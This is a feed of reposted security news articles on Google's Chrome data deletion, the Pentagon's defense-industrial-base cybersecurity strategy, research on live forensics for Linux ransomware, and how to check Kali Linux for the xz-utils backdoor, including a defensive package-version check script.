The data deletion is a key milestone in Google’s Privacy Sandbox initiative, which aims to phase out third-party cookies in Chrome by the second half of 2024, subject to addressing any remaining competition concerns from the UK’s Competition and Markets Authority.

The initiative includes the introduction of Tracking Protection, a new feature that limits cross-site tracking by restricting website access to third-party cookies by default.

Impact on User Privacy

The settlement and the Privacy Sandbox initiative represent significant steps towards enhancing user privacy on the web.

Google’s commitment to deleting extensive data and limiting tracking cookies showcases a shift towards a more privacy-conscious browsing experience.

The changes are vital to ensure that Google remains in compliance with the EU’s General Data Protection Regulation (GDPR).

Future of Web Browsing

As Google continues to work on making the web more private, it also provides businesses with tools to succeed online.

The goal is to ensure that high-quality content remains freely accessible while creating a more private web than ever.

The regulatory environment keeps changing, but Google’s proactive steps to prioritize privacy in company culture and product design are positioning the company for what lies ahead.

Google’s decision to delete billions of users’ data marks a significant development in digital privacy.

With the implementation of the Privacy Sandbox and Tracking Protection, Google is setting a new standard for privacy on the web, balancing innovation with robust data privacy protections.

The post Google to Delete Billions of User’s Personal Data Collected Via Chrome Browser appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

Pentagon Releases Cybersecurity Strategy To Strengthen Defense Industrial Base

The DoD DIB Cybersecurity Strategy is a three-year plan (FY24-27) to improve cybersecurity for defense contractors that aims to create a secure and resilient information environment for the Defense Industrial Base (DIB).

It will be achieved through collaboration between DoD and DIB, focusing on four key goals: strengthening DoD’s cybersecurity governance, enhancing contractor cybersecurity posture, ensuring critical capabilities are cyber-resilient, and improving collaboration with the DIB.

The strategy is in line with national strategies and makes use of the National Institute of Standards and Technology’s Cybersecurity Framework.

FY 2024 – 2027 DoD DIB Cybersecurity Strategy

DoD relies on the DIB to develop advanced technologies and maintain critical infrastructure, yet DIB companies are vulnerable to cyberattacks from foreign adversaries and non-state actors, which could result in unauthorized access to sensitive data and disruption of critical business operations.

The DoD has established a multi-pronged approach to improving DIB cybersecurity, including collaboration with industry associations and public-private partnerships.

The strategy will inform future updates to DoD’s DIB cybersecurity plan and focus on protecting DoD information, ensuring DIB supplier continuity of operations, and making the DIB more cyber-secure.

Current DoD and DIB Cybersecurity Efforts

The Department of Defense (DoD) will strengthen its governance structure for Defense Industrial Base (DIB) cybersecurity by fostering collaboration among stakeholders and developing regulations.

It includes establishing a DIB Cybersecurity Executive Steering Group (ESG) to coordinate policies and a DoD DIB Cybersecurity Program to implement a DoD-wide strategic approach.

It also works with DIB and interagency stakeholders to improve information sharing and develop a governance framework for subcontractor cybersecurity, improving the cybersecurity posture of the Defense Industrial Base (DIB) through a number of initiatives.

The initiatives include requiring DIB contractors to implement cybersecurity best practices and undergo assessments, sharing threat intelligence with DIB contractors, and improving the ability to recover from cyberattacks.

It will also work with DIB contractors to evaluate the effectiveness of cybersecurity regulations and policies.

DoD DIB Cybersecurity Strategic Alignment

The Department of Defense needs to prioritize the cybersecurity of critical Defense Industrial Base (DIB) production capabilities, which is achievable by working with the DIB Sector Coordinating Council (SCC) to identify critical suppliers and facilities and setting clear policies on cybersecurity for them.

The DoD, as the Sector Risk Management Agency (SRMA) for the DIB, should focus government-led protection efforts on these critical assets, which will ensure that limited resources are directed towards the most impactful activities.

According to the Media Defense, DoD will collaborate with DIB to improve cybersecurity posture by leveraging commercial cybersecurity service providers, improving communication channels, and expanding information sharing.

NSA will share threat intelligence with DIB, and DIB SCC will collaborate with DoD to improve information sharing and also develop cyber incident scenarios and response playbooks to improve DIB’s resilience.

NIST Cybersecurity Framework 2.0 Core

The DoD DIB Cybersecurity Strategy outlines a collaborative effort between DoD and DIB to strengthen cybersecurity posture, which emphasizes information sharing, education, and baseline security requirements.

DoD will leverage expertise from the NSA, DC3, and USCYBERCOM to improve detection and response. The aim is to continuously improve DIB cybersecurity through collaboration and resource coordination, ensuring the resilience of critical defense suppliers and producers against evolving cyber threats.

The post Pentagon Releases Cybersecurity Strategy To Strengthen Defense Industrial Base appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

Live Forensic Techniques To Detect Ransomware Infection On Linux Machines

Ransomware, initially a Windows threat, now targets Linux systems, endangering IoT ecosystems.

Linux ransomware employs diverse encryption methods, evading traditional forensics.

Still developing, it shows potential for Windows-level impact. Early awareness allows for assessing IoT security implications.

The following cybersecurity analysts from Edinburgh Napier University recently unveiled live forensic techniques to detect ransomware infection on Linux machines:

  • Salko Korac

  • Leandros Maglaras

  • Naghmeh Moradpoor

  • Bill Buchanan

  • Berk Canberk

Live Forensic Techniques Ransomware

The increased use of IoT technologies has brought about interconnected devices that operate without human intervention, making them susceptible to ransomware attacks, especially in Linux-based IoT systems.

Although there have been efforts against paying ransoms, and cyber-criminal activities have shifted due to political issues, ransomware is still a significant concern, with new ways of evading countermeasures.

For this reason, proactive security measures are vital in protecting IoT environments from this growing threat.

Response chain (Source – Arxiv)

In total, 24 major execution experiments were performed, with retests, across 12 combinations involving three samples of ransomware on two Linux operating systems with two permission levels.

To balance realism and effort, virtual machines simulated cloud environments to allow external memory dumps and network captures without the ransomware being detected.

Originally designed to be very realistic, the initial design led to lengthy forensic investigations that called for retesting environments to validate unforeseen results as well as removing disturbing elements.

Playbook for experiment execution (Source – Arxiv)

Unlike Windows ransomware, with its lateral movement and encryption of file shares and web server files that also provide user logins, Linux ransomware was not able to achieve very damaging results.

User files were encrypted by Cl0p and Icefire, thereby disabling GUI logins, while Blackbasta malware was aimed at /vmfs/volumes.

Most importantly, none of them used administrative permissions adequately; hence MySQL/Sybase, SSH, FTP, and any Samba sharing were all left unharmed although they had been running as root.

Conversely, in companies that prefer external storage to home or root directories, the observable impact might have been even smaller.

Ransomware activities exhibited by Linux are determined by those observed in Windows.

The research provides insights into the implications of Linux ransomware for the IoT industry.

Instead of encrypting data, criminals may attack IoT devices to block operations temporarily until payment is made.

Linux ransomware requires a lot of work and doesn’t scale well as it has to be specifically developed for each individual target, unlike modular Windows variants.

IoT solutions with strong security and low market visibility have less threat. The most scalable among these can attack either endpoints, gateways, or cloud infrastructure.

Further findings indicate that attackers use encryption techniques such as RC4, ChaCha20, and AES, which makes live forensics more challenging than on Windows platforms.

Recommendations

Presently, Linux ransomware causes limited harm, but it is expected to change in the future.

Risk management measures are suggested to secure Linux systems to enable risk evaluation and mitigation in the IoT industry.

The recommendations are:

  • Avoid HOME directories

  • Separate and restrict permissions and data access

  • Avoid using privileged users

  • Focus on identifying backdoors

  • Shut down first

The post Live Forensic Techniques To Detect Ransomware Infection On Linux Machines appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

tresronours@parlote.facil.services

xz-utils Backdoor Affects Kali Linux Installations – How to Check for Infection

A critical vulnerability has been identified in the xz-utils package, versions 5.6.0 to 5.6.1, which harbors a backdoor capable of compromising system security.

This vulnerability, cataloged under CVE-2024-3094, poses a significant threat to the Linux ecosystem, including the widely used Kali Linux distribution, known for its robust security and penetration testing tools suite.

The Vulnerability: CVE-2024-3094

The backdoor discovered in the specified versions of xz-utils could allow an attacker to bypass sshd authentication, thereby gaining unauthorized remote access to the affected system.

Given the ubiquity of xz-utils across various Linux distributions, the potential for widespread compromise was alarmingly high.

Fortunately, the issue was identified and addressed swiftly, mitigating the potential damage.

The vulnerability has been patched in Debian, from which Kali Linux derives much of its software base, thereby rectifying the issue for Kali users.

Impact on Kali Linux

For Kali Linux users, the vulnerability window was narrow but critical. The affected xz-utils version, 5.6.0-0.2, was available in the Kali repositories from March 26th to March 29th.

Users who updated their Kali Linux installations within this timeframe are at risk and must take immediate action to secure their systems.

If your Kali Linux system was not updated during this period, you are not at risk from this specific vulnerability.

However, staying informed and vigilant about system updates is always advisable to maintain security.

How to Check for Infection and Update

To determine if your Kali Linux system is affected, you can execute the following command in the terminal:

kali@kali:~$ apt-cache policy liblzma5
liblzma5:
 Installed: 5.4.5-0.3
 Candidate: 5.6.1+really5.4.5-1
 Version table:
    5.6.1+really5.4.5-1 500
       500 http://kali.download/kali kali-rolling/main amd64 Packages
*** 5.4.5-0.3 100
       100 /var/lib/dpkg/status

If the output indicates the installed version as 5.6.0-0.2, your system is vulnerable, and you must upgrade to the latest version, 5.6.1+really5.4.5-1. This can be achieved with the following commands:

kali@kali:~$ sudo apt update && sudo apt install -y --only-upgrade liblzma5
...
kali@kali:~$
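
The manual check above can be scripted for a fleet of hosts. The following is an added example, not code from the article or from Kali: the function names are hypothetical, the embedded policy output is the one shown in the article, and the live check assumes a dpkg-based system where dpkg-query is available.

```shell
#!/bin/sh
# Added example (not from the article): classify a liblzma5 package version
# against the xz-utils releases the article names for CVE-2024-3094.

# Output copied from the article's `apt-cache policy liblzma5` run.
sample_policy_output() {
    cat <<'EOF'
liblzma5:
 Installed: 5.4.5-0.3
 Candidate: 5.6.1+really5.4.5-1
 Version table:
    5.6.1+really5.4.5-1 500
       500 http://kali.download/kali kali-rolling/main amd64 Packages
*** 5.4.5-0.3 100
       100 /var/lib/dpkg/status
EOF
}

# Read `apt-cache policy` output on stdin and print the installed version.
installed_from_policy() {
    awk '$1 == "Installed:" { print $2; exit }'
}

# Print "affected", "not-affected" or "not-installed" for a Debian version.
classify_liblzma_version() {
    ver=$1
    case "$ver" in
        ''|'(none)') echo "not-installed"; return 0 ;;
    esac
    ver=${ver#*:}                      # drop an epoch prefix if present
    case "$ver" in
        # "X+reallyY" packages ship upstream release Y, so judge Y:
        # 5.6.1+really5.4.5-1 contains 5.4.5 code.
        *+really*) ver=${ver##*+really} ;;
    esac
    upstream=${ver%-*}                 # strip the Debian revision ("-0.2")
    case "$upstream" in
        5.6.0|5.6.1) echo "affected" ;;
        *)           echo "not-affected" ;;
    esac
}

# Live check on a dpkg-based host; returns non-zero when affected.
check_installed_liblzma() {
    command -v dpkg-query >/dev/null 2>&1 || {
        echo "dpkg-query not found" >&2
        return 2
    }
    # '\n' separator so multi-arch installs print one version per line.
    ver=$(dpkg-query -W -f='${Version}\n' liblzma5 2>/dev/null | head -n 1)
    status=$(classify_liblzma_version "$ver")
    echo "liblzma5 ${ver:-(none)}: $status"
    [ "$status" != "affected" ]
}

# Run against the local package database only when asked to.
if [ "${1:-}" = "--live" ]; then
    check_installed_liblzma
fi
```

A "not-affected" result describes the package installed now; it does not show whether 5.6.0-0.2 was installed at some point between March 26th and March 29th.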

For those seeking more detailed information on this vulnerability, several resources are available:

  • Help Net Security provides a summarized post on the details of the vulnerability.

  • Openwall features the initial disclosure of the vulnerability.

  • The National Vulnerability Database (NVD) entry for CVE-2024-3094 offers comprehensive information on the specifics of the vulnerability.

This incident serves as a reminder of the constant vigilance required in the digital age to protect against evolving cybersecurity threats.

Users are encouraged to promptly apply updates and stay informed on the latest security advisories.

The post xz-utils Backdoor Affects Kali Linux Installations – How to Check for Infection appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder